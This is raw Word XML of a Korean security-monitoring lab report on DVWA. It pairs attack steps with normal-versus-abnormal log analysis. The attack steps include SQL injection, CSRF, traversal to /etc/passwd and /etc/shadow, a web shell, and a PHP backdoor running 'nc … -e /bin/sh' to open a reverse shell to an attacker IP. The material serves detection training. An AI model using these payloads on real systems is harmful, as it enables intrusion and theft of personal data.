        <w:trPr>
          <w:trHeight w:val="837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780034"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="76" name="그림 %d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1.bmp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78003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파라미터 내용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id=1과 같이 단순한 숫자나 문자열 전달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id=%27or+%271%27%3D%271%27+%23 등 SQL 구문 조작 시도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특수문자 활용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특수 기호 없이 일반적인 데이터 값만 포함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싱글 쿼터(%27), 플러스(+), 주석 기호(#, %23) 등 쿼리 제어 문자 다수 포함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응답 크기(Size)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조회 결과에 따른 고정된 응답 바이트 수 (예: 4388)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 xml:space="preserve">모든 데이터를 불러오면서 응답 크기가 비정상적으로 증가 (예: 4388 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4665)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="256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경로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일반적인 서비스 이용 경로 접근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취약점이 노출된 특정 경로(vulnerabilities/sqli/)에 집중적인 공격 페이로드 전송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URL의 쿼리 스트링(id=) 내에 데이터베이스의 논리 구조를 조작하는 SQL 예약어(or) 및 특수 기호(', #)가 인코딩된 형태로 포함되어 전송되는 패턴을 보고 SQL Injection 공격으로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시나리오 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (수정 예정)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>kali씨는 특정 사이트의 고객들의 개인정보를 가져다가 중국에 팔아버리는 방법으로 큰 돈을 벌어보고자 한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>“대형 사이트의 개인정보를 가져와서 큰 돈을 벌어보자!!!”</w:t>
      </w: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1) 악성 쉘 스크립트를 이용한 시스템 설정(프록시 설정) 강제 변조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10.4.0.6 (Ubuntu GUI)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프록시 강제 설정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.sh(스크립트 파일) 실행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/var/log/syslog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2777"/>
        <w:gridCol w:w="709"/>
        <w:gridCol w:w="3486"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1176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6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150620" cy="1097280"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="77" name="그림 %d 7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2.bmp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20" cy="109728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7" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-13081</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>60325</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2518537" cy="1438148"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="78" name="그림 %d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3.bmp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537" cy="143814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악성 스크립트 파일을 다운받아 실행</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="83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5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267970"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="79" name="그림 %d 7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4.bmp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267970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변경 주체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공식 NetworkManager가 설정을 반영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일반 스크립트(.sh, .desktop)가 변경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로그 내용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연결 상태 변경(CONNECTED) 위주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Proxy set to [IP:포트] 명시적 기록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발생 시점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부팅 시 또는 네트워크 환경 변화 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의심스러운 파일 실행 직후 또는 반복 발생</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="256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네트워크 경로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게이트웨이를 통해 외부와 직접 통신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공격자의 사설 IP(172.16.24.105)를 경유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관리 도구가 아닌 nautilus-autostart.desktop 프로세스가 실행되어 특정 IP 주소로 Proxy set to 메시지를 남기며 프록시 설정을 강제 변경하는 경우를 비정상 로그로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2) CSRF 공격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10.4.0.6 (Ubuntu GUI)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비밀번호 강제 변경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python3 csrf.py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/var/log/apache2/dvwa_access_log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2777"/>
        <w:gridCol w:w="709"/>
        <w:gridCol w:w="3486"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1176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6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6952" cy="1047877"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="80" name="그림 %d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5.bmp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952" cy="104787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6" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>74549</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>94869</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2386584" cy="1479042"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="81" name="그림 %d 8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6.bmp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147904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926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사용자의 유효한 세션 쿠키를 악용하여, 사용자의 의도와 상관없이 비밀번호 변경</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># BurpSuite를 이용하여 쿠키값을 해당 csrf.py에 내용 기입</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="83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6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408432"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="82" name="그림 %d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7.bmp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408432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메서드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비밀번호는 본문에 숨기는 POST 방식 사용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URL에 모든 데이터가 노출되는 GET 방식 사용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User-Agent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Chrome, Firefox 등 실제 브라우저 정보 기록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python-requests/2.32.5와 같은 자동화 도구/스크립트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URL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일반적인 계정 설정 경로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/vulnerabilities/csrf/ 등 취약점 경로 및 파라미터 포함</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="256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비밀번호 노출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로그에 암호가 남지 않음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password_new=asd123%21%40와 같이 평문 암호가 기록됨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웹 로그의 User-Agent에 python-requests가 기록되어 있고, GET 방식의 URL 파라미터에 비밀번호(password_new) 정보가 평문으로 노출된 로그를 비정상으로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3) File Inclusion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10.4.0.6 (Ubuntu GUI)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서버 내부로 침투하기 위한 웹사이트 취약점 분석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홈페이지 URL 뒤에 page=“부분 변경”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/var/log/apache2/dvwa_access_log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2777"/>
        <w:gridCol w:w="709"/>
        <w:gridCol w:w="3486"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1176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6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151763"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="83" name="그림 %d 8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8.bmp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15176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6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598295"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="84" name="그림 %d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9.bmp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59829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DVWA 사이트 File Inclusion 메뉴에 URL 변경</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>page=../../../../../etc/passwd  # 서버의 /etc/passwd 파일의 정보가 뜨는지 확인 -&gt; 성공</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>page=../../../../../etc/shadow  # 서버의 /etc/shadow 파일의 정보가 뜨는지 확인 -&gt; 실패</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="83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6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1245489"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="85" name="그림 %d 8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a.bmp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124548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파일 경로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include.php, file1.php 등 서비스 내의 일반 파일 호출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/etc/passwd, /etc/shadow 등 시스템 핵심 설정 파일 호출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문자열 패턴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특이사항 없음 (정해진 페이지 호출)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상위 경로로 이동하기 위한 경로 조작 문자열(../)이 반복됨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URL 파라미터(?page=)에 상위 경로 이동 문자열(../)과 시스템 핵심 설정 파일(etc/passwd, etc/shadow) 경로가 포함된 패턴을 보고 비정상 로그로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4) File Upload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10.4.0.6 (Ubuntu GUI)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파일 업로드를 통해 취약한 서버인지 확인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File Upload 페이지에서 사진 업로드후 Upload 클릭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/var/log/apache2/dvwa_access_log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2777"/>
        <w:gridCol w:w="709"/>
        <w:gridCol w:w="3486"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1176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7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796669"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="86" name="그림 %d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b.bmp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79666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7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255649"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="87" name="그림 %d 8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c.bmp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255649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사진 파일(di.jpeg) 업로드</w:t>
            </w:r>
          </w:p>
        </w:tc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업로드를 하면 파일 위치를 알려준다</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-&gt; 취약하다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="83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7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-78994</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5198364" cy="432308"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="88" name="그림 %d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d.bmp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432308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메서드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GET (업로드 페이지를 단순히 불러옴)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POST (서버로 파일을 전송하여 업로드 시도)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요청 경로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일반적인 서비스 페이지 경로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/vulnerabilities/upload/ (취약점 테스트용 업로드 경로)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파일 업로드 기능이 있는 취약점 경로(/vulnerabilities/upload/)에 POST 메서드로 접근하여 서버로부터 성공 응답(200 OK)을 받은 기록을 비정상 로그로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5) Web Shell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10.4.0.6 (Ubuntu GUI)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취약 서버 접근 권한 획득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color w:val="000000"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pP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/var/log/apache2/dvwa_access_log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3486"/>
        <w:gridCol w:w="3486"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1176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77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13655" cy="1429004"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="89" name="그림 %d 8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e.bmp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655" cy="142900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커맨드가 가능한 WebShell을 업로드후 경로로 접속하여 그 커맨드를 이용하여 ls, pwd 같은 명령어를 사용하여 파일 경로나 현재 위치 계정을 알 수 있다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="837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7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529844"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="90" name="그림 %d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bf.bmp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52984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실행 패턴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특정 파일의 화면 출력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업로드된 파일 뒤에 ?cmd=ls 같은 명령어를 붙여 실행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로그 예시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GET /hackable/uploads/command.php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GET /hackable/uploads/command.php?cmd=ls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판단 근거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단순 페이지 호출로 시스템에 영향이 없음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?cmd=ls와 같은 파라미터를 통해 서버 명령어를 직접 전달함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업로드된 PHP 파일 호출 시 URL 파라미터로 시스템 명령어(?cmd=ls)를 전달하여 서버 내부 정보를 조회하거나 실행하는 패턴을 보고 비정상 로그로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6) Web Shell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10.4.0.6 (Ubuntu GUI)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취약점을 이용해 지속적인 원격 실행 통로를 만드는 것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?php shell_exec('nc 10.4.0.4 8888 -e /bin/sh'); ?&gt;""" &gt; backdoor.php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/var/log/apache2/dvwa_access_log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2777"/>
        <w:gridCol w:w="709"/>
        <w:gridCol w:w="3486"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1176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635127"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="91" name="그림 %d 9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c0.bmp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635127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887603"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="92" name="그림 %d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c1.bmp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88760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백도어쉘을 서버에 심어두고 ls 로 설정 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="83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838073"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="93" name="그림 %d 9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c2.bmp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83807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파라미터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/hackable/uploads/command.php와 같이 단순히 파일만을 호출함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command.php?cmd=echo... 또는 ?cmd=ls와 같이 명령어 파라미터를 전달함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데이터 포함 여부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특이사항 없음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nc, shell_exec, /bin/sh 등 리버스 쉘용 악성 코드 및 리다이렉션(&gt;) 문자가 포함됨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업로드 경로 내 PHP 파일 호출 시 cmd= 파라미터를 사용해 시스템 명령어나 쉘 실행 코드(nc, shell_exec 등)를 전달하여 파일을 생성하거나 조회하는 패턴을 비정상 로그로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78"/>
        <w:gridCol w:w="6712"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="839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z w:val="24"/>
              </w:rPr>
              <w:t>■</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 7) Reverse Shell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대상 IP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10.4.0.6 (Ubuntu GUI)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목적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서버의 완전한 제어권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설정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nc -lvp 8888</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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로그</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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24"/>
              </w:rPr>
              <w:t>/var/log/apache2/dvwa_access_log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839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18"/>
        <w:gridCol w:w="2777"/>
        <w:gridCol w:w="709"/>
        <w:gridCol w:w="3486"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1176"/>
        </w:trPr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9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990346"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="94" name="그림 %d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c3.bmp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990346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19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534412" cy="1043051"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="95" name="그림 %d 9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c4.bmp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412" cy="104305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78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 xml:space="preserve">공격자 칼리서버에서 nc -lvp 8888 포트를 열어주고 웹쉘에서 </w:t>
            </w:r>
            <w:hyperlink w:history="1" r:id="rId45">
              <w:r>
                <w:rPr>
                  <w:color w:val="0000ff"/>
                  <w:sz w:val="18"/>
                  <w:u w:val="single" w:color="0000ff"/>
                </w:rPr>
                <w:t>http://dvwa.wj.com/hackable/uploads/backdoor.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 로 실행</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="837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drawing>
                <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="9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8364" cy="364363"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="96" name="그림 %d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C:\Users\sinu\AppData\Local\Temp\Hnc\BinData\EMB00002f382cc5.bmp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364" cy="364363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정상 로그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비정상 로그</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="292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상태 코드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200 OK (성공), 302 (리다이렉트)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504 Gateway Timeout (연결 대기/지연)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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z w:val="18"/>
              </w:rPr>
              <w:t>호출 경로</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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/login.php, /index.php 등 서비스 경로</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="348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/hackable/uploads/backdoor.php (업로드 폴더 내 실행 파일)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보안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웹 서비스의 정상 경로가 아닌 업로드 폴더 내 실행 파일(backdoor.php)을 호출하여, 로그상에 타임아웃 에러 코드(504)가 기록되는 패턴을 보고 비정상 로그로 판단한다.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z w:val="18"/>
              </w:rPr>
              <w:t>차단 정책</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="839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</w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>네트워크 ACL 정책으로 차단한다.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pacing w:val="-4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51.png"  /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.bmp"  /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.bmp"  /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.bmp"  /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.bmp"  /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.bmp"  /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.bmp"  /><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.bmp"  /><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.bmp"  /><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.bmp"  /><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.bmp"  /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.bmp"  /><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.bmp"  /><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.bmp"  /><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.bmp"  /><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.bmp"  /><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.bmp"  /><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.bmp"  /><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.bmp"  /><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.bmp"  /><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.bmp"  /><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.bmp"  /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.bmp"  /><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.bmp"  /><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.bmp"  /><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.bmp"  /><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.bmp"  /><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.bmp"  /><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.bmp"  /><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.bmp"  /><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.bmp"  /><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.bmp"  /><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.bmp"  /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.bmp"  /><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.bmp"  /><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.bmp"  /><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.bmp"  /><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.bmp"  /><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.bmp"  /><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dvwa.wj.com/hackable/uploads/backdoor.php" TargetMode="External" /><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.bmp"  /><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"  /><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"  /><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"  /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.bmp"  /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.bmp"  /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.bmp"  /><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.bmp"  /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.bmp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보안관제 대응 협조 요청 보고서 </dc:title>
  <dc:creator>TJ</dc:creator>
  <cp:lastModifiedBy>sinu</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-05T05:12:03.779</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-07T05:50:55.961</dcterms:modified>
  <cp:version>0501.0100.01</cp:version>
</cp:coreProperties>
</file>